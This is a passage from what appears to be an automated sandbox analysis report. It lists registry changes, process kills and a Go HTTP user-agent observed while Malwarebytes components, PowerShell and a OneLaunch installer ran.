| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
GoLang User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Go-http-client/1.1 | N/A | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\mbamtray.exe = "11000" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\mbam.exe = "11000" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\mbamtray.exe = "11000" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\mbam.exe = "11000" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Office\16.0\Common\Security\Trusted Protocols\All Applications\malwarebytes:\ | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Policies\Microsoft\Office\16.0 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMWsc.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Office\16.0\Common\Security\Trusted Protocols | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\Office\15.0\Common\Security\Trusted Protocols | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMWsc.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Office\16.0 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\Office\16.0\Common\Security | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\conhost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Policies\Microsoft\Office\15.0\Common | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Policies\Microsoft\Office\16.0\Common\Security\Trusted Protocols\All Applications | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\Office\16.0\Common\Security\Trusted Protocols\All Applications\malwarebytes: | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\Office\16.0\Common\Security\Trusted Protocols\All Applications\malwarebytes: | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Office\15.0\Common\Security\Trusted Protocols\All Applications | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\dbclsupdate\delta1\mbupdatrV5.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\dbclsupdate\delta1\mbupdatrV5.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\Office | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\conhost.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\Office\16.0\Common\Security\Trusted Protocols\All Applications\malwarebytes:\ | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\MY | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{278637DA-FDFB-45C7-8CD8-F2D8A9199AB0}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{44AC1571-055F-4CC8-B7D8-EA022C4CC112}\ = "ICleanControllerEventsV6" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{46AEAC9A-C091-4B63-926C-37CFBD9D244F} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{CCEFCD43-B934-4168-AE51-6FE07D3D0624}\TypeLib\Version = "1.0" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{118F4330-CAF5-4A54-ABB0-DC936669ED2F}\TypeLib\ = "{5709DEEB-F05E-4D5C-8DC4-3B0D924EE08F}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{D7A05281-DB9E-4E02-9680-E4D83CDAA6AB} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{96C7187E-6EC4-49BD-88C7-04A3A8A97CC5}\TypeLib\Version = "1.0" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{FB81F893-5D01-4DFD-98E1-3A6CB9C3E63E}\ = "IMWACControllerV12" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{D88AC9B4-2BC3-4215-9547-4F05743AE67B}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D4AC5360-A581-42A7-8DD6-D63A5C3AA7F1} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F415899A-1576-4C8B-BC9F-4854781F8A20}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{783B187E-360F-419C-B6DA-592892764A01} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8307A4A5-A025-438B-B23B-8EE38A453D54}\TypeLib\ = "{332AFEBA-9341-4CEC-8EA6-DB155A99DF63}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E46A48DF-07CC-4C7F-89BB-145CF0DFC60A}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FFB94DF8-FC15-411C-B443-E937085E2AC1}\1.0\HELPDIR\ = "C:\\Program Files\\Malwarebytes\\Anti-Malware" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{8B05F69B-4F9B-4FD3-A491-16153F999E00}\TypeLib | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F3968E6D-3FD5-4707-A5A8-4E8C3C042062} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{01222402-A8AB-4183-8843-8ADBF0B11869}\TypeLib\ = "{49F6AC60-2104-42C6-8F71-B3916D5AA732}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0F2D6C4F-0B95-4A53-BA9D-55526737DC34}\TypeLib\ = "{49F6AC60-2104-42C6-8F71-B3916D5AA732}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{55E4B8FB-921C-4751-8B2D-AE33BD7D0B74}\TypeLib\Version = "1.0" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7AEBAD20-B80A-427D-B7D5-D2983291132E}\ = "ICustomScanParameters" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{FB81F893-5D01-4DFD-98E1-3A6CB9C3E63E}\ProxyStubClsid32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{2F14F58B-B908-4644-830F-5ACF8542D27F} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{FA484BC6-E101-4A87-AAF3-B468B3F2C6BB}\TypeLib | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{EEC295FA-EC51-4055-BC47-022FC0FC122F}\1.0\0\win64 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{61964EBA-D9C0-4834-B01C-A6133F432BB1}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FA6C70E7-6A6D-4F4A-99BF-C8B375CB7E0C}\ProxyStubClsid32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B32065E5-189E-4C5F-AA59-32A158BAF5B7}\ProxyStubClsid32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{2A153977-1A37-4EF7-9226-9E128FA51AE1}\TypeLib | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{49F6AC60-2104-42C6-8F71-B3916D5AA732}\1.0\0\win64\ = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\\8" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F275D775-3A22-4C5A-B9AD-6FE8008304D0}\ProxyStubClsid32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A9AE95CF-6463-415A-94AC-F895D0962D30}\ = "IUpdateControllerV12" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MB.UpdateController | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{31A02CB9-6064-4A3B-BCB4-A329528D4648}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{25321640-5EF1-4095-A0DA-30DE19699441}\TypeLib | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5250E5C8-A09C-4F87-A0DA-A46A62A0EACF}\ = "IArwControllerV3" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{8E1F91DE-30AF-469B-9A09-FCF176207F0F}\TypeLib | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{FA484BC6-E101-4A87-AAF3-B468B3F2C6BB}\TypeLib\ = "{74630AE8-C170-4A8F-A90A-F42D63EFE1E8}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BFC6C7E6-8475-4F9B-AC56-AD22BECF91C4}\TypeLib\ = "{783B187E-360F-419C-B6DA-592892764A01}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BF153224-DA64-41F1-AA87-321B345870FA} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B1BDE8B0-F598-4334-9991-ECC7442EEAA6}\TypeLib | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B9F73DD6-F2A4-40F8-9109-67F6BB8D3704}\ProxyStubClsid32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B1F1EB48-7803-4D84-B07F-255FE87083F4}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C9669A3D-81E8-46F6-A51E-815A0863D612}\TypeLib | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{6C5B978B-68C9-45C7-9D6E-0BA57A3C7EB2} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{993A5C11-A9B8-41E9-9088-C5182B1F279A} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{21EA9E3C-6507-4725-8F4F-ED4DDDE7A709}\TypeLib | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\MBAMExt.MBAMShlExt.1 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DE03E614-112D-43E0-8E15-E7236CC32108}\TypeLib | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B38EDC4F-A2CD-4F76-8607-F123FE4031D5}\TypeLib | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E2D56B7B-4B87-45A1-A6D3-5C77035141A6}\TypeLib | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DC97FF29-5CE2-4897-8175-94672057E02D}\TypeLib | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{08927360-710B-483B-BEEC-17E51FF84AF9}\ = "_IRTPControllerEventsV6" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{31BF2366-C6DB-49F1-96A5-8026B9DF4152}\TypeLib\Version = "1.0" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{ADCD8BEB-8924-4876-AE14-2438FF14FA17}\ProxyStubClsid32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{57CE581A-0CB6-4266-9CA0-19364C90A0B3}\InprocServer32\ = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\mbshlext.dll" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{376BE474-56D4-4177-BB4E-5610156F36C8}\TypeLib\ = "{74630AE8-C170-4A8F-A90A-F42D63EFE1E8}" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BADF77CD-ECCE-4B36-88FF-6A2804FFE307}\TypeLib | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DD3CFEBD-3B8E-4651-BB7C-537D1F03E59C} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{616E9BE3-358B-4C06-8AAB-0ACF8D089931} | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{ADCD8BEB-8924-4876-AE14-2438FF14FA17}\ = "IPoliciesControllerV5" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1498570331-2313266200-788959944-1000_Classes\wbappbar | C:\Users\Admin\AppData\Local\Temp\is-0CG1L.tmp\OneLaunch Setup_3x8a5.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{251AD013-20AD-4C3F-8FE2-F66A429B4819}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
